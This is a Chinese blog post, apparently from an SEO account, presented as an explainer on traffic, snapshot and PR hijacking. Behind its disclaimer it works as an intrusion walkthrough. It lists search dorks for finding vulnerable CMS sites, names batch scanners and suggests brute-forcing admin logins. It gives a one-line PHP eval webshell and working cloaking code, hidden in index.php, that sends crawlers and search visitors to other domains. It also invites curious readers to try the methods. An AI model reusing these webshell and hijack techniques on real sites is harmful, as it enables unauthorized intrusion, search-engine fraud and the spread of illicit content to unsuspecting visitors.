瓜瓜只是科普
并不想教坏你们……
看到标题的时候,不知道你们什么感觉,是不是觉得麻瓜君一直在带坏你们,把你们引入黑暗的深渊呢?
我们的目的只是为了科普,探索我们不知道的东西而已,当然还是进入科普环节……
在互联网的世界里,其实流量劫持并不是什么件新鲜事。所谓流量劫持,无非就是指通过一定技术手段,控制你们的上网行为,让你们打开不想打开的网页,看到不想看的广告,当你们打开了之后,你们的行为就会给劫持者带去源源不断的收入。
什么意思呢?很简单。。。
明明打开的是www.magua12138.com网站,莫名其妙却被跳转至www.fzeme.com的网站;明明想下的是A软件,下载安装后却发现是B软件;还有打开一个App,弹出让人心乱如麻的广告,你们以为电脑手机中毒了?
我就呵呵了,错!或许你们真的错怪了病毒,因为这个时候你们的互联网流量很可能被劫持了。
尽管这种现象很早就存在,也有很多人杜绝或者厌恶,但在“用户就是小绵羊”的环境下,流量劫持始终“野火烧不尽,春风吹又生”。
到底谁在劫持流量?
流量劫持背后的“恶魔之手”究竟什么样?
根据《IT时报》记者调查发现,在互联网世界,流量劫持背后有一个庞大的灰色产业链,仅DNS劫持一种方式,每天被恶意劫持的流量至少有上千万个IP。
今天我们话题就围绕着“劫持”两个字,随便扯一扯……
劫持其实有很多,比如说什么,流量劫持、快照劫持、PR劫持等,其实前几个步骤都一样,就是最后的脚本不同而已……
我们按顺序来,因为是劫持别人的站,所以我们要做的第一步肯定是获取劫持站的后台权限,并留下后门,以便日后管理,这个过程就是常说的拿站(webshell)。
从难易度来说,最容易的就是企业站了,因为大多数的企业站都是采用开源系统,很多系统因本身的问题存在诸多安全隐患,比如虐心的dede(我们常用的织梦CMS)。
有些系统的漏洞已经曝光出来,找到这些漏洞的特征和这个漏洞对应的系统,然后去各种渠道搜集使用这个系统的网站,遍历扫描每个站,如果存在这个漏洞,就暴力破解后台账户名和密码。
收集目标网站,最简单的方法是拿漏洞的特征做关键词到搜索引擎去搜,然后把搜索结果页上的网站全部抓下来。熟悉网站的瓜友肯定对下面的关键词非常熟悉了比如说:
Powered by DEDECMS
inurl:HomeMarket.asp
有限公司--Powered by ASPCMS V2.0
用户登陆 inurl:admin/login.asp。。。还有XXX技术支持等等
然后拿抓下来以后就可以对这些网站去进行漏洞了,你们肯定一脸懵逼,是不是想问怎么扫描?
用很多现成的拿站工具可以完成批量的扫描和破解,然而每个工具不能能覆盖所有漏洞,所以需要交叉使用:
御剑后台扫描
wwwscan GUI版
web扫描工具-WVS
椰树WEB漏洞扫描器
Pker多线程后台极速扫描器
Web应用安全漏洞检测工具
Acunetix Web Vulnerability Scanner 8
如果过程顺利的话,就可以拿到一些网站的后台账户跟密码了,然后就可以正常登陆了。
这个时候你们就需要留一个后门,在网站后台新建一个php文件(用DW),写入一句话木马:<?php eval($_POST['ee']); ?>,通过菜刀(一个非常好用而又强大的webshell管理软件,如“中国菜刀”)添加shell,无异常的话就已经顺利的拿下一个站了。
接下来在后台写入劫持代码,比如要劫持首页,在后台找一个很隐蔽的地方新建一个php文件,写入类似的代码:
<?php
$httpuser=strtolower($_SERVER['HTTP_USER_AGENT']);
if(strstr($httpuser,'Baiduspider') or strstr($httpuser,'Googlebot') or strstr($httpuser,'Sogou web spider')){
$url=‘http://www.magua121381.com';$a=file_get_contents($url);echo $a;exit;
}
$httpuser=strtolower($_SERVER['HTTP_REFERER']);
if(strstr($httpuser,'baidu') or strstr($httpuser,'google') or strstr($httpuser,'sogou')){
$url=‘http://www.magua121382.com';header("Location:$url");exit;
}
?>
我们怎么去理解这句话呢?意思其实非常简单,大致可以这么理解,若蜘蛛来访,则抓取 www.magua121381.com的内容;若来路为搜索引擎,则返回www.magua121382.com的内容,然后上传到网站的根目录……
之后在首页文件index.php中调用刚才新建的文件:
<?php
include(“{新建文件的路径}")
?>
当然,www.magua121381.com 和 www.magua121382.com 可以设为同一个网址。(如果你们真这么设置,你们做那么多的目的是什么= =)
这就是快照劫持的简单步骤了,被劫持的站,对蜘蛛访问返回www.magua121381.com的内容,对从搜索引擎搜索过来的用户返回www.magua121382.com的内容,你如果输入网站的域名(网站url),则是本来的页面。一般负责网站管理的人,都只输入url访问网站,index.php也很少关注,所以好长时间才发现,甚至发现不了自己的网站被劫持。
有的时候在百度中搜索很多违禁的词语,会出现一堆政府的网站,但是点进去是却看到各种违禁内容(百度站长平台还专门开了一个“bad case”的帖子专门收集类似的案例),直接输入网址访问,却是正常的内容,若果换一个搜索词从百度点进去,还是正常的内容。这就是在刚才所说的劫持代码的基础上完成的,根据referer词来判断是否返回指定页面,现在百度已经取消referer参数了,所以这东西也就随之失效了,我们略过……
进入下一个环节,PR劫持,就是对蜘蛛301到指定的网站,(301就不特别解释了,301重定向的意思,自己上网查一下)从而提升权重。有些新站,做了不到1个月,用站长工具一查,哎哟我去,权重值都在4以上,但网站本身并没多少内容和收录,如果有看到这样的情况,基本是用了PR劫持了……
简单来说,PR值的计算是有周期的,假如A网站的PR值是4,B网站是0,我们把A网站劫持到B网站,在PR值计算过后,再取消劫持,那么B网站就拥有了4的PR值,至少能保持到下次计算的时候……
最后说一个快照劫持,因为最近看见的比较频繁且很少人知道,利用JS脚本来霸屏搜索引擎……
怎么做到的?脚本怎么写?
这样改变世界的做法你们真的认为很容易就能实现吗?
事实上的确很容易……用一些软件就可以了。
我们来看看这个软件的搜索跳转功能,支持各大搜索引擎,使从任意方式搜索出点击到你网站后,搜索网站页面自动跳转到指定的网站,自定义网站功能支持一级,多级,长尾域名格式。优化来路,默认百度,防止百度蜘蛛被k。
这软件还有一些奇特的功能,看图不说话……
手机也是可以的……
这个软件还真是丧心病狂阿。。。
建议很多玩搜索方面的瓜友如果是因为好奇,可以跟着麻瓜君的思路探索一下,但是如果是为了自己的公司,或者是自己所在的企业长远的考虑,建议不要运用以上任何一种手法,到时候别说我没提醒你们哦。
今天我们仅仅科普下劫持原理,还有很多的细节没有展开说,比如批量管理webshell,又比如说如何隐蔽踪迹。
如果藏的不是非常隐蔽,基本都会被发现,只是时间长短问题,且作上去的排名都活不了太长时间,而且会带来你意想不到的惩罚,说白了,能获得多大效果,取决于能铺多少量,是个耗费精力、时间的力气活,所以还是专心研究白帽SEO吧……